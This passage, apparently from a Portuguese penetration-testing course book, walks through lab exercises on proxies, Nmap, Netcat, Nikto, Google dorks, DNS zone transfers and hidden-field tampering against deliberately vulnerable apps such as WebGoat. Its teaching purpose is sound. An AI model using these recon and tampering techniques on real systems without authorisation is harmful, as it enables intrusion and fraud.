A interface bem simples e permite que o usurio altere a quantidade do elemento

presente no carrinho de compras ou que efetive o pedido, clicando no boto Purchase.
Quando isto acontece, a seguinte requisio enviada para o servidor web:
POST http://webgoat.esr.rnp.br:8080/webgoat/
attack?Screen=60&menu=1700 HTTP/1.1
Host: webgoat.esr.rnp.br:8080
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.13)
Gecko/20101206 Ubuntu/10.04 (lucid) Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/
xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.7,pt-br;q=0.3
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://webgoat.esr.rnp.br:8080/webgoat/
attack?Screen=60&menu=1700
Cookie: JSESSIONID=325E4532DAA7BD43EA8C2AE5824783C0
Authorization: Basic Z3Vlc3Q6Z3Vlc3Q=
Content-Type: application/x-www-form-urlencoded
Content-length: 35
QTY=1&SUBMIT=Purchase&Price=2999.99
Observe-se que o corpo da requisio contm os parmetros QTY, SUBMIT e Price. Qual
seria o motivo do preo ser submetido como parte da requisio? Normalmente, apenas as
informaes que sero processadas pela aplicao so enviadas e, assim, razovel supor
que o valor ser empregado para compor o total do pedido. Se esta hiptese estiver correta,
a alterao do valor do campo escondido far com que o preo desejado seja cobrado pelo
produto. Este passo, executado por meio da tela de interceptao do WebScarab, est ilus-
trado na Figura 2.11, e o resultado, na Figura 2.12.
66
Figura 2.11
Interceptao da
requisio e alte-
rao do valor do
campo Price.
Figura 2.12
Tela exibindo o total
do pedido.
Segurana de controles
Controles no lado cliente so seguros? Em caso negativo, explique o motivo.
Contramedidas
Para evitar que uma aplicao padea de vulnerabilidades relacionadas a controles q
implementados no lado cliente, as seguintes melhores prticas devem ser observadas:
1 Parta da premissa de que todos os usurios da aplicao so maliciosos e, por isso,

toda informao fornecida por eles deve ser validada no servidor, imediatamente
antes de ser utilizada.
1 No assuma que informaes armazenadas em campos escondidos no podem ser

alterados por um usurio, uma vez que no esto visveis.
1 Implemente controles no lado cliente da aplicao, apenas para evitar que um

usurio bem intencionado submeta, por erro, formulrios com campos inconsistentes
e consuma banda de rede desnecessariamente.
1 Nunca espere que todos os parmetros previstos sejam recebidos como parte
da requisio. Usurios maliciosos podem remover um ou mais itens, antes de
submet-la aplicao.
67
68
Atividade 1 Ferramentas bsicas
Nesta atividade, o aluno se familiarizar com as ferramentas bsicas que so utilizadas nas
diversas etapas de um teste de invaso. Para inici-la, carregue as mquinas virtuais do
aluno e do servidor (Fedora) e execute os roteiros na primeira delas.
Proxies de interceptao
Para utilizar proxies de interceptao, necessrio configurar a ferramenta para escutar
a porta desejada e o navegador para direcionar todo trfego para ela. Os roteiros abaixo
ilustram como isso pode ser realizado nos proxies Burp Suite, Paros e WebScarab e nos
navegadores Firefox, Opera e Chrome.
Configurao de porta no Burp Suite
1. Inicie o Burp Suite, presente no menu Aplicativos\Curso Ferramentas.
2. Clique na aba Proxy e, em seguida, na aba-filha Options.
3. Selecione a primeira linha da tabela e clique no boto Edit.
4. Digite a porta desejada no campo local listener port e mantenha listen on loopback
interface only habilitado.
5. Para finalizar, clique em Update.
Configurao de porta no Paros
6. Inicie o Paros, presente no menu Aplicativos\Curso Ferramentas.
7. Clique no menu Tools e no sub-menu Options....
8. Selecione na parte esquerda da janela, a opo Local proxy.
9. Digite a porta desejada no campo Port (eg 8080). Para este exerccio, escolha a porta 9000.
10. Para finalizar, clique em OK.
Configurao de porta no WebScarab
1. Inicie o WebScarab, presente no menu Aplicativos\Curso Ferramentas.
2. Clique na aba Proxy e, em seguida, na aba-filha Listeners.
3. Selecione a primeira linha da tabela e clique no boto Stop.

4. Digite a porta desejada no campo Port, abaixo da tabela.
5. Para finalizar, clique em Start.
Configurao do Firefox
1. Inicie o Firefox, presente no menu Aplicativos\Internet.
2. Inicie o proxy desejado. Para este exerccio, utilize o WebScarab, presente no menu
Aplicativos\Curso Ferramentas.
69
3. No Firefox, clique em Edit, seguido de Preferences.
4. Clique na opo Advanced e na aba Network.
5. Clique em Settings.
6. Selecione Manual proxy configuration.
7. Digite localhost no campo HTTP Proxy e 8008 no campo Port.
8. Clique em Use this proxy server for all protocols.
9. Limpe o campo No proxy for.
10. Finalize a configurao, clicando em OK e em Close.
11. Os passos seguintes so para testar o acesso via WebScarab, mas sem interceptao de
nenhuma das requisies.
12. No WebScarab, selecione a aba Proxy e a aba-filha Manual Edit.
13. Desmarque as opes Intercept Requests e Intercept Responses.
14. Clique na aba Summary e veja que no h nada nas tabelas.
15. Retorne ao Firefox e acesse exemplo.esr.rnp.br.
16. Volte ao WebScarab e veja que as tabelas na aba Summary foram preenchidas com as
requisies efetuadas pelo acesso acima.
17. Encerre o WebScarab.
Configurao do Multiproxy Switch
O Multiproxy Switch um complemento para Firefox, que permite selecionar um proxy a

partir de uma lista pr-cadastrada, simplificando muito o trabalho de configurao.
possvel exibi-lo na barra de ferramentas, no menu de contexto e na barra de estado do
navegador, de acordo com as preferncias do usurio.
O roteiro abaixo inclui o Paros na lista de proxies cadastrados.
2. Clique no Multiproxy Switch, na parte direita da barra de estado, e observe que j existem
alguns itens cadastrados.
3. Selecione Manage Proxies.
4. Clique em Add.
5. Preencha Proxy Label com Paros, HTTP Proxy com localhost, Port com 9000 e selecione
Use this proxy server for all protocols.
6. Clique em OK nas duas janelas.
7. Clique novamente no Multiproxy Switch e veja que um item para o Paros foi adicionado.
Configurao do Opera
1. Inicie o Opera, presente no menu Aplicativos\Internet.
2. Inicie o proxy desejado. Para este exerccio, utilize o Burp Suite, presente no menu
70
3. No Opera, clique em Menu, seguido de Configuraes e Preferncias.
4. Clique na aba Avanado.
5. Escolha o item Rede na parte esquerda da janela.
6. Clique em Servidores de Proxy.
7. Habilite as configuraes para o protocolo HTTP, preenchendo os campos HTTP e

Porta com os valores localhost e 8089, respectivamente.
8. Habilite as configuraes para o protocolo HTTPS, preenchendo os campos HTTPS e Porta

com os valores localhost e 8089, respectivamente.
9. Clique em OK nas duas janelas, para finalizar a configurao.
10. Os passos seguintes so para testar o acesso via Burp Suite, mas sem interceptao de
11. No Burp Suite, selecione a aba Proxy e a aba-filha Options.
12. Role a tela at encontrar a seo intercept client requests.
13. Desabilite a opo intercept if da seo intercept client requests.
14. Desabilite a opo intercept if da seo intercept server responses.
15. Ainda na aba Proxy, clique na aba-filha History e veja que a tabela est vazia.
16. Retorne ao Opera e acesse exemplo.esr.rnp.br.
17. Volte ao Burp Suite e veja que a tabela na aba History foi preenchida com as requisies
efetuadas pelo acesso acima.
18. Encerre o Burp Suite.
Configurao do Chrome
19. Inicie o Chrome, presente no menu Aplicativos\Internet.
20. Inicie o proxy desejado. Para este exerccio, utilize o Paros, presente no menu
21. No Chrome, clique no cone de chave inglesa, localizado ao lado da barra de endereo e
selecione Preferncias.
22. Selecione a aba Under the Hood.
23. Role a pgina at encontrar a seo Network.
24. Clique em Change proxy settings.
25. Na aba Configurao do proxy, selecione Configurao manual de proxy.

26. Selecione Usar o mesmo proxy para todos os protocolos e preencha os campos Proxy HTTP e
Porta com os valores localhost e 9000, respectivamente.
27. Clique em Fechar e, na mensagem que aparece, em Fechar, novamente.
28. Para finalizar, clique em Fechar na janela de preferncias.
29. Os passos seguintes so para testar o acesso via Paros, mas sem interceptao de
30. No Paros, selecione a aba Trap.
71
31. Limpe os check-boxes Trap request e Trap response.
32. Clique na aba History, localizada na parte inferior da tela, e veja que no h itens listados ali.
33. Retorne ao Chrome e acesse exemplo.esr.rnp.br.
34. Volte ao Paros e veja que a lista na aba History foi preenchida com as requisies efetu-
adas pelo acesso acima.
35. Encerre o Paros.
Web spiders
O objetivo desta atividade que o aluno tenha um primeiro contato com web spiders, para
utiliz-los nos exerccios sobre mapeamento.
Spider do Burp Suite
1. Inicie o Burp Suite, presente no menu Aplicativos\Curso Ferramentas.
2. Selecione a aba Spider.
3. Selecione a aba-filha Control e veja as opes disponveis.
4. Selecione a aba-filha Options e veja as opes disponveis.
5. Para finalizar, clique em Help e em spider help e faa uma breve leitura do contedo.
6. Encerre o Burp Suite.
Spider do Paros
2. Selecione a aba Spider, na parte inferior da tela, e veja as opes disponveis.
3. Clique em Analyse e em seguida em Spider. O que acontece?
4. Encerre o Paros.
Spider do WebScarab
2. Selecione a aba Spider e veja as opes disponveis.
3. Clique em Help e em Contents.
4. Expanda o ramo WebScarab Plugins, selecione The Spider plugin e leia o contedo apresentado.
Varredores de portas e servios

O representante mais conhecido deste tipo de software o Nmap, cuja interface grfica
oficial o Zenmap. Siga o roteiro abaixo para um contato inicial com a ferramenta.
1. Abra uma janela de terminal.
2. Veja a documentao do Nmap:
man nmap
72
3. Execute uma varredura local bsica e analise o relatrio apresentado:
nmap localhost
4. Encerre o terminal.
Outras ferramentas
H outras ferramentas que podem ser utilizadas em testes de invaso de aplicaes web,
das quais, nesta atividade, sero abordadas o Netcat, o OpenSSL e o Nikto.
Netcat
O roteiro abaixo emprega o Netcat para implementar um modelo cliente-servidor simples.
2. Veja a documentao do Netcat:
$ man netcat
3. Digite o comando abaixo para que o Netcat escute conexes na porta 7000:
$ nc l 7000
4. Abra outro terminal.
5. Conecte-se primeira instncia do Netcat, por meio do comando:
$ nc localhost 7000
6. Digite alguns textos e veja que so refletidos no outro terminal.
7. Encerre o cliente pressionando Control+D.
8. Encerre uma das janelas de terminal.
OpenSSL
Como se sabe, o Netcat no capaz de tratar os protocolos SSL e TLS nativamente e,

assim, o roteiro abaixo ilustra como o OpenSSL pode preencher esta lacuna, por meio do
comando s_client.
9. Mude o foco para a janela de terminal da ltima atividade.
10. Conecte-se ao servidor w3s.esr.rnp.br, com o comando:
$ openssl s_client -connect w3s.esr.rnp.br:443
11. Acesse a pgina raiz, digitando:
$ GET / HTTP/1.0
12. Role a janela para visualizar a sada do OpenSSL.
Nikto
1. Mude o foco para a janela de terminal da ltima atividade.
2. Veja a documentao do Nikto:
$ man nikto
3. Encerre a janela de terminal.
73
Atividade 2 Reconhecimento
O objetivo desta atividade exercitar os diversos passos que fazem parte da etapa de
reconhecimento de um teste de invaso, cujo propsito levantar o mximo possvel de
informaes da aplicao alvo.
Levantamento de informaes em fontes pblicas

Muitas informaes teis para um teste de invaso podem ser obtidas em fontes pblicas,
como redes sociais, grupos de discusso e anncios de emprego. Com o roteiro abaixo, que
deve ser executado em uma janela de terminal, algumas das informaes sobre a organi-
zao em que trabalha sero identificadas.
Considere as redes sociais de que participa. Identifique que informaes sobre tecnologias
utilizadas pela organizao em que trabalha podem ser extradas de seus perfis e das comu-
nidades de que faz parte.
1. Consulte as informaes de registro de domnio da sua organizao e identifique informa-

es relevantes para testes de invaso.
$ whois <nome de domnio da empresa>
2. Identifique os servidores de nome e de e-mail da sua organizao, com o seguinte

comando:
$ dig ANY <nome de domnio da empresa>
3. Tente executar uma transferncia de zona DNS para o domnio da sua organizao. Na
remota possibilidade desta funcionalidade estar habilitada, uma vulnerabilidade acaba de
ser encontrada e precisa ser corrigida.
$ dig t AXFR <nome de domnio da empresa>
Google hacking
Mecanismos de busca como o do Google permitem encontrar muitas informaes sobre
uma aplicao e, assim, so muito teis em testes de invaso. Nesta prtica, o aluno execu-
tar diversas consultas ao Google, para explorar as opes existentes. Para cada pesquisa,
observe o total de itens encontrados, o tempo de execuo e as pginas listadas.
1. Inicie o navegador de sua preferncia e acesse www.google.com.
2. Para encontrar pginas em ingls sobre testes de invaso em aplicaes web, submeta a
seguinte pesquisa:
web application penetration testing

3. Altera a pesquisa para a seguinte e observe o que muda nos resultados:
web application OR penetration testing
4. Aplique a seguinte alterao para buscar pginas que possuam web application ou
penetration testing:
web application OR penetration testing
5. Execute a pesquisa abaixo para listar varredores de vulnerabilidades:
vulnerability scanners
74
6. Se no estiver interessado no Nessus, por exemplo, inclua -nessus:
vulnerability scanners nessus
7. Veja o que o Google encontra sobre a sua empresa, digitando:
<nome da empresa em que trabalha>
8. Para restringir a busca ao domnio da sua empresa, empregue o operador site:
site:<domnio da empresa>
9. Verifique se sua empresa possui algum sistema web voltado para internet com uma
pgina de autenticao de usurio:
site:<domnio da empresa> login OR logon
10. Procure na internet stios web com listagem de diretrios habilitada:
intitle:Index of
11. Para encontrar arquivos .bak, utilize a pesquisa:
intitle:Index of filetype:bak
12. Localize na internet relatrios gerados pelo Nessus:
This file was generated by Nessus
Identificao de sistema operacional, servios e portas
Neste exerccio, ser realizada a identificao do sistema operacional, servios e portas do

servidor que hospeda exemplo.esr.rnp.br.
1. Inicie uma janela de terminal.
2. Execute o comando e analise o relatrio gerado:
$ nmap exemplo.esr.rnp.br
3. O comando acima apenas identificou as portas e servios do servidor, mas no exibiu

nada sobre o sistema operacional e plataformas que fornecem os servios. Isso pode ser
obtido com a opo -A:
$ nmap -A exemplo.esr.rnp.br
Quantos e quais servidores web foram identificados?

4. Aparentemente, a opo -A fez apenas metade do trabalho esperado, pois no identi-

ficou o sistema operacional. O motivo disso que, para essa funcionalidade ser executada
corretamente, o programa deve ser executado por um usurio privilegiado. Assim, chame
o Nmap via sudo e fornea a sua senha quando solicitada:
$ sudo nmap -A exemplo.esr.rnp.br
75
5. O Nmap possui uma interface grfica oficial, chamada de Zenmap. Inicie-a, a partir do
menu Aplicativos\Curso Ferramentas e fornea sua senha, quando solicitada.
6. Explore as opes disponveis na interface grfica.
7. Digite exemplo.esr.rnp.br no campo Target e observe como o campo Command atualizado

em tempo real.
8. Clique no boto Scan e aguarde at que a tarefa seja executada.
9. Analise o resultado, percorrendo as abas Nmap output, Ports / Hosts, Topology, Host Details
e Scans.
10. Feche a janela do Zenmap, mas mantenha o terminal aberto para a prxima atividade.
Identificao do servidor web

Na atividade anterior, o Nmap j realizou um timo trabalho na identificao de servidores
web. Apesar disso, sempre bom conhecer mtodos alternativos de se realizar a mesma
tarefa. Assim, nesta atividade, sero estudadas tcnicas adicionais para identificar o tipo de
servidor web em uso.
2. Acesse http://exemplo.esr.rnp.br/blabla e veja se a mensagem de erro d alguma pista

sobre o servidor. o mesmo que o identificado pelo Nmap? Esta tcnica robusta?
3. Repita o passo anterior para as seguintes URLs:
http://exemplo.esr.rnp.br:81/blabla
4. Outra tcnica consiste na anlise do cabealho Server, fornecido pelo servidor como parte
das respostas. Para realizar este teste, abra uma nova janela de terminal e digite o texto
abaixo, finalizando com [Enter] duas vezes:
$ nc exemplo.esr.rnp.br 80
HEAD / HTTP/1.0
O valor do cabealho supracitado est de acordo com o tipo de servidor identificado pelo
Nmap? Esta tcnica robusta?
5. Repita o Passo 4, substituindo a porta 80 por 81, 8080 e 8090.
6. Houve algum problema ao realizar o teste para a porta 81? Provavelmente sim, e o motivo
que o lighttpd, na verso 1.4, somente aceita linhas terminadas pelos caracteres CR e LF,
enquanto que o sistema operacional Linux adota apenas o caractere LF. Para corrigir isto,
utilize a opo -C do Netcat.
7. A ltima tcnica envolve o uso do utilitrio httprint. Inicie-o a partir do menu

76
8. Na tabela localizada abaixo do campo Signature File, insira uma linha para cada uma das
portas no conjunto {80, 81, 8080, 8090}, com Host igual a exemplo.esr.rnp.br e com o
check-box marcado. Para incluir uma nova linha, basta pressionar a tecla [Enter], quando
o foco estiver em Host ou Port.
9. Clique no boto Options, desabilite a opo ICMP Enable e clique em OK.
10. Para iniciar a execuo, clique no boto que contm uma seta verde.
11. Compare o resultado com o Nmap, por meio da coluna Banner Deduced, e observe que no
foi muito satisfatrio. Esse resultado, contudo, pode ser melhorado por meio da adio
de assinaturas de servidores web ao arquivo signatures.txt do httprint. A localizao deste
arquivo pode ser observada no campo Signature File, que, no exerccio, aparece como um
subdiretrio do drive Z, porque o utilitrio est sendo executado via Wine.
12. Selecione na tela do httprint a linha do servidor lighttpd e copie para a rea de transfe-
rncia (Control-C) a regio abaixo da tabela, contendo nome do servidor e cinco linhas
em hexadecimal.
13. Abra uma janela de terminal e digite o seguinte comando, fornecendo a senha quando
solicitada:
$ sudo gedit /usr/share/httprint_301/win32/signatures.txt
14. Logo aps a linha # $AUTOGENERATED: {version}, cole o que copiou do httprint, deixando
uma linha em branco antes da seo seguinte.
15. Salve o arquivo e execute novamente o httprint. O que acontece?
16. Feche as janelas do gedit, httprint e terminais.
Levantamento dos mtodos suportados pelos servidores web
Neste roteiro, por meio do mtodo OPTIONS, o aluno deve identificar os mtodos supor-
tados pelos quatro servidores web instalados na mquina virtual Fedora.
17. Abra uma janela de terminal e digite o texto abaixo, finalizando com [Enter] duas vezes:
$ nc exemplo.esr.rnp.br 80
OPTIONS / HTTP/1.0
18. Repita o processo para as portas 81, 8080 e 8090, lembrando-se como proceder, no caso
do lighttpd.
19. Feche a janela de terminal.
Deteco de hosts virtuais

Nesta atividade, sero exercitados mtodos para a deteco dos hosts virtuais.
1. Inicie o navegador de sua preferncia.
2. Acesse http://dvwa.esr.rnp.br.
3. Acesse http://exemplo.esr.rnp.br.
77
5. Digite o comando abaixo e anote o endereo IP:
$ ping -c 1 dvwa.esr.rnp.br
6. Digite o comando abaixo e anote o endereo IP:
$ ping -c 1 exemplo.esr.rnp.br
7. Quando os dois endereos IP so iguais e os dois stios so acessados pela mesma porta,
significa que so hospedados virtualmente pelo mesmo servidor, que os discerne pelo
nome de domnio. A desvantagem deste mtodo, porm, que nem sempre haver dois
nomes de domnio diferentes disposio, para realizar o teste descrito.
8. Uma tcnica diferente, que depende de sorte para funcionar, consiste em acessar o stio
web por meio do endereo IP. Assim, considere que a aplicao alvo seja dvwa.esr.rnp.br
e a acesse em um navegador web utilizando o endereo IP descoberto no Passo 5. Observe
que a pgina exibida pertence ao domnio exemplo.esr.rnp.br, o que implica que a hos-
pedagem virtual por nomes utilizada. O fator azar est relacionado chance do stio web
alvo ser exatamente o host padro do servidor web. Neste caso, o teste no conclusivo.
9. Repita o exerccio anterior para os servidores web que escutam nas portas 81, 8080
e 8090 da mesma mquina. Primeiro, observe a pgina obtida pelo acesso com a URL
http://exemplo.esr.rnp.br:<porta> e, em seguida, por meio de endereo IP, com a URL
http://192.168.213.200:<porta>. Quais esto utilizando hospedagem virtual?
10. A ltima tcnica envolve o uso de uma ferramenta web para mapear endereos IP para
nomes de domnio. Inicie acessando uma janela de terminal.
11. Digite o comando abaixo para descobrir o endereo IP do servidor web da sua empresa:
$ dig <URL do stio web da sua empresa>
12. Acesse http://whois.webhosting.info em um navegador, digite o endereo IP encontrado

no passo anterior e clique em Go.
13. Se domnios de empresas diferentes forem listados, o stio web de sua empresa est
armazenado em um servidor com hospedagem virtual habilitada.
14. Feche o navegador e a janela de terminal.
Descoberta de arquivos e diretrios
Para finalizar as atividades sobre reconhecimento, o aluno executar a ferramenta Nikto

para descoberta de arquivos e diretrios instalados por padro nos servidores web.
2. Digite o comando abaixo e observe o relatrio gerado:

$ nikto C all -host exemplo.esr.rnp.br -port 80
3. Anote todos os recursos encontrados para uso na fase de mapeamento.
4. Repita o exerccio acima, trocando a porta 80 por 81, 8080 e 8090.
78
Atividade 3 Mapeamento
Nesta atividade, o aluno realizar o mapeamento de uma aplicao web, contida na
mquina virtual Fedora. A ferramenta bsica que ser utilizada o web spider, para cpia
local das pginas e recursos que compem a aplicao.
Cpia das pginas e recursos da aplicao

Nesta atividade, o aluno poder comparar os web spiders que fazem parte das sutes inte-
gradas de teste Burp Suite, WebScarab e Paros.
Uso do spider do Paros
2. Clique em Tools e em Clear Recent History, para limpar o histrico. Na janela que aparece,
selecione Everything para Time range to clear, marque todos os itens em Details e pressione
Clear now.
4. No Firefox, clique no Multiproxy Switch, na barra de estado, e selecione o Paros.
5. Clique no marcador Mutillidae, para acessar a aplicao.
6. Percorra os links Register, Login, Logout, Show log, Credits, User info, DNS
Lookup, Add to your blog, View someones blog, Browser info, Text file viewer e
Source viewer e submeta quaisquer formulrios que forem apresentados.
7. Acesse pginas, diretrios e arquivos encontrados na fase de reconhecimento.
8. No Paros, percorra e analise o mapa criado na aba Sites.
9. Clique em Tools, seguido de Options....
10. Selecione Spider na parte esquerda da janela.
11. Inclua a URL http://mutillidae.esr.rnp.br/setupreset.php em URLs to be skipped e not read.
12. Desmarque POST forms.
13. Clique em OK.
14. Selecione http://mutillidae.esr.rnp.br na aba Sites e clique com o boto direito.
15. Selecione Spider e clique em Start. O processo demorar alguns minutos.
16. Analise novamente o mapa criado na aba Sites.
17. Selecione a aba Spider, na parte inferior da tela.
18. Observe que as URLs encontradas no processo de cpia so listadas no quadro inferior
da tela.
19. No encerre o Paros.
Uso do spider do WebScarab
Clear now.
79
4. No Firefox, clique no Multiproxy Switch, na barra de estado, e selecione o WebScarab.
8. No WebScarab, selecione a aba Summary.
9. Analise o mapa da aplicao, organizado em rvore, e as requisies na tabela localizada

abaixo deste. Observe as colunas existentes nas duas partes.
10. Selecione a aba Spider.
11. Preencha o campo Allowed Domains com .*esr\.rnp\.br.*.
12. Marque Synchronise cookies e Fetch Recursively.
13. Expanda a rvore referente aplicao Mutillidae e selecione a URL.
14. Clique em Fetch Tree. Infelizmente, o WebScarab no possui uma barra de progresso da
tarefa e, assim, a nica maneira de saber que o processo terminou quando nenhum
item for adicionado ou removido da tela.
15. Retorne aba Summary e analise novamente o mapa da aplicao.
16. Observe na tabela de requisies que algumas linhas com Origin igual a Spider foram
includas pelo Passo 14.
17. No encerre o WebScarab.
Uso do spider do Burp Suite
Clear now.
3. Inicie o BurpSuite, presente no menu Aplicativos\Curso Ferramentas.
4. No Firefox, clique no Multiproxy Switch, na barra de estado, e selecione o Burp Suite.
8. No Burp Suite, selecione a aba Target e a aba-filha Site map.
9. Analise o mapa da aplicao na parte esquerda da tela, a lista de requisies e os detalhes

destas e das respostas.
10. No mapa da aplicao, clique com o boto direito sobre o item referente ao Mutillidae e
selecione Add item to scope.
80
11. Clique novamente com o boto direito sobre o item referente ao Mutillidae, selecione
Spider this host e clique no boto Yes, na mensagem que aparece.
12. Neste processo, algumas janelas para submisso de formulrios aparecero. Preencha os
campos e clique em Submit form, sempre que isso acontecer.
13. Observe que novos elementos foram adicionados ao mapa da aplicao, ao fim do processo.
14. Procure pelo arquivo config.inc e selecione-o. Que contedo interessante ele revela?
15. Agora, procure pelo arquivo accounts.txt, selecione-o e observe o que ele contm. Qual a
utilidade das informaes encontradas?
16. No encerre o Burp Suite.
Identificao dos pontos de entrada de informao

A partir das pginas e recursos copiados no primeiro passo do mapeamento, necessrio
identificar pontos de entrada de informao, que sero empregados para testar a presena
de uma srie de vulnerabilidades. As anotaes podem ser feitas em uma planilha, listando
mtodo, URL, parmetros, cabealhos e quaisquer outras informaes que possam ser teis
para o teste de invaso.
No Paros
1. Retorne janela do Paros.
2. Selecione a aba Request.
3. Selecione a aba History.
4. Percorra os itens do histrico, um a um, analisando a requisio que foi realizada e identi-
ficando parmetros passados em requisies GET e POST.
5. Repita o processo para o mapa da aplicao.
6. Selecione a aba Response.
7. Percorra os itens do histrico, um a um, analisando a resposta fornecida e observando

cabealhos no padronizados e definies de cookies.
8. Repita o processo para o mapa da aplicao.
9. Feche a janela do Paros.
No WebScarab
10. Retorne janela do WebScarab.
11. Selecione a aba Summary.
12. Percorra os itens do mapa da aplicao, um a um, analisando as colunas marcadas e a

dica que fornecem.
13. Analise os itens contidos na tabela de requisies e observe os parmetros passados em

requisies GET e POST.
81
14. Role a tabela at o item com menor ID.
15. D um duplo clique sobre ele e veja que uma tela com detalhes da requisio e da res-
posta aparece.
16. Esta janela dividida em quatro sees separadas por uma barra fina, contendo setas no
lado esquerdo. Clique nas setas que apontam para baixo na primeira e terceira barras.
Isto ocultar o corpo das mensagens.
17. Na seo de requisio, clique na aba Raw.
18. Percorra os diversos itens, clicando no boto Next, e, durante esta tarefa, observe os
parmetros passados em requisies GET e POST, cabealhos no padronizados e pontos
em que cookies so definidos.
19. Feche a janela do WebScarab.
No Burp Suite
20. Retorne janela do Burp Suite.
21. Selecione a aba Target e a aba-filha Site map.
22. Clique na barra Filter e marque o campo Show only in-scope items.
23. Clique novamente na barra para recolher a janela.
24. Selecione a aba Request, abaixo da tabela de requisies, e a aba-filha Raw.
25. Percorra os itens do mapa da aplicao, um a um, analisando a requisio que foi reali-
zada e identificando parmetros passados em requisies GET e POST.
26. Selecione a aba Response, abaixo da tabela de requisies, e a aba-filha Raw.
27. Percorra os itens do mapa da aplicao, um a um, analisando a resposta gerada pelo ser-
vidor e identificando cabealhos no padronizados e pontos em que so definidos cookies.
28. Clique com o boto direito na raiz do mapa da aplicao e selecione Copy links in this host.
29. Abra o gedit, localizado no menu Aplicativos\Acessrios, e pressione Ctrl+V, para colar os
links existentes nas pginas da aplicao. Veja se encontra alguma coisa interessante.
30. Feche a janela do Burp Suite.
Atividade 4 Descoberta e explorao de vulnerabilidades

O propsito da presente atividade introduzir ao aluno o processo de descoberta e explo-
rao de vulnerabilidades. Ser abordada a explorao de controles no lado cliente, que,
muitas vezes, constitui o nico ponto de validao das informaes fornecidas pelos usu-
rios. Como se sabe, tal prtica censurvel, pois, normalmente, uma tarefa trivial quebrar
este tipo de mecanismo. Nos exerccios que se seguem, recomenda-se que o aluno tente
traar a estratgia de explorao, antes de seguir o roteiro fornecido.
Acesso ao WebGoat
Os exerccios desta atividade sero executados no OWASP WebGoat, uma aplicao con-
tendo vulnerabilidades propositais, para o estudo de segurana em aplicaes web.
82
3. Selecione a aba-filha Manual Edit, sob a aba Proxy, e desmarque a opo Intercept requests.
5. Clique no marcador WebGoat e fornea guest e guest, quando usurio e senha

forem solicitados.
6. Clique em Start WebGoat.
Evaso de restries em campos HTML

Neste exerccio, um formulrio contendo diversos campos com restries apresentado
pela aplicao e o aluno deve violar todas as regras definidas. Para facilitar na soluo,
pense qual elemento responsvel por honrar as restries dos campos.
1. Selecione a aba Summary no WebScarab e identifique o ID da ltima requisio.
2. No WebGoat, clique no menu Parameter Tampering e no sub-menu Bypass HTML

Field Restrictions.
3. Verifique as restries definidas para cada campo do formulrio.
4. Submeta o formulrio, clicando em Submit.
5. Retorne ao WebScarab, d um duplo clique na requisio posterior identificada no

passo 1 e observe os parmetros passados via POST. Repare que o campo desabilitado
no submetido ao servidor.
6. Feche a janela.
7. Clique na aba Proxy e na aba-filha Manual Edit.
8. Marque a opo Intercept requests e desmarque as demais.
9. Volte ao Firefox e pressione Ctrl+U para visualizar o cdigo-fonte.
10. Pressione Ctrl+F e digite Disabled input field:, para encontrar o campo desabilitado.
11. Anote o nome do campo, definido no elemento <input>, e feche a janela de visualizao de
cdigo-fonte.
12. Clique em Submit novamente. Uma janela aparece, contendo a requisio que ser efe-
tuada. Para alterar o valor de um parmetro, basta dar um duplo clique na coluna Value,
na linha correspondente, e digitar a nova informao.
13. Clique em Insert.
14. Substitua o nome Variable pelo identificado no Passo 11.
15. Altere os seis parmetros para o valor blabla.
16. Clique em Accept changes.

17. O exerccio finalizado com sucesso e a mensagem * Congratulations. You have

successfully completed this lesson. exibida.
Evaso de validao Javascript

O objetivo deste exerccio ilustrar como a validao de informaes, por meio de Javascript,
pode ser facilmente quebrada, quando ela no ratificada pelo servidor.
2. Desmarque todas as opes.
83
3. Retorne ao WebGoat e clique no menu Parameter Tampering e no sub-menu Bypass Client
Side JavaScript Validation.
4. Leia as regras definidas para cada campo, altere-os para valores invlidos e submeta o
formulrio, clicando em Submit.
5. Veja que a validao local identifica problemas nos campos e impede que a requisio
seja realizada. Feche a janela de mensagem.
6. Clique em Restart this lesson.
7. Retorne ao WebScarab e clique em Intercept requests.
8. Volte ao Firefox e submeta o formulrio novamente. Uma janela aparece, contendo a

requisio que ser efetuada.
9. Insira o caractere ! ao final dos valores dos parmetros.
11. O exerccio finalizado com sucesso e a mensagem * Congratulations. You have

successfully completed this lesson. exibida.
Explorao de campo escondido

Esta atividade simula uma aplicao para suporte a cliente, que permite enviar uma men-
sagem ao administrador, por meio do formulrio fornecido. O objetivo enviar mensagens a
pessoas arbitrrias, mesmo sem a existncia de tal opo.
2. Desmarque todas as opes.
3. Retorne ao WebGoat e clique no menu Parameter Tampering e no sub-menu Exploit

Unchecked Email.
4. Role a pgina at o final do formulrio, preencha-o e clique em Send!.
5. Veja no final da pgina apresentada o formato da mensagem submetida.
6. Retorne ao WebScarab e clique em Intercept requests.
7. Volte ao Firefox e submeta uma nova mensagem pelo sistema. Uma janela aparece, con-
tendo a requisio que ser efetuada.
8. Observe a existncia do parmetro to. Este um campo escondido do formulrio, que

teria sido encontrado na fase de mapeamento da aplicao. Isto um exemplo da impor-
tncia de no se pular etapas.
9. Altere o valor do parmetro to para friend@owasp.org.

11. Role at o final da pgina e verifique que a mensagem foi enviada ao e-mail
friend@owasp.org, em vez de webgoat.admin@owasp.org. A pgina de sucesso no
aparece, porque este roteiro apenas parte do esperado.
84
Bibliografia 2
1 DOUP, Adam; COVA, Marco e VIGNA, Giovanni. Why Johnny Cant Pentest: An Analysis of
Black-box Web Vulnerability Scanners. In: Proceedings of Seventh Conference on Detection of
Intrusions and Malware & Vulnerability Assessment (DIMVA 2010). Bonn, Germany, 2010.
1 HERZOG, Pete. OSSTMM 3 The Open Source Security Testing Methodology Manual
Contemporary Security Testing and Analysis. ISECOM, 2010.
1 LONG, Johnny; TEMMINGH, Roelof; STEWART, Jeff; PETKOV, Petko D. e LANGLEY, Ryan.
Google Hacking for Penetration Testers: Volume 2 a completely new volume of Google
hacking techniques. Syngress, 2008.
1 MCGRAW, Gary. Software Security: Building Security In. Addison-Wesley Professional, 2006.
1 NETMARKETSHARE. Browser market share. Disponvel em: http://marketshare.hitslink.
com/report.aspx?qprid=0. Data de acesso: 28/12/2010.
1 POSTEL, Jon. RFC 793 Transmission Control Protocol DARPA Internet Program
Protocol Specification. 1981.
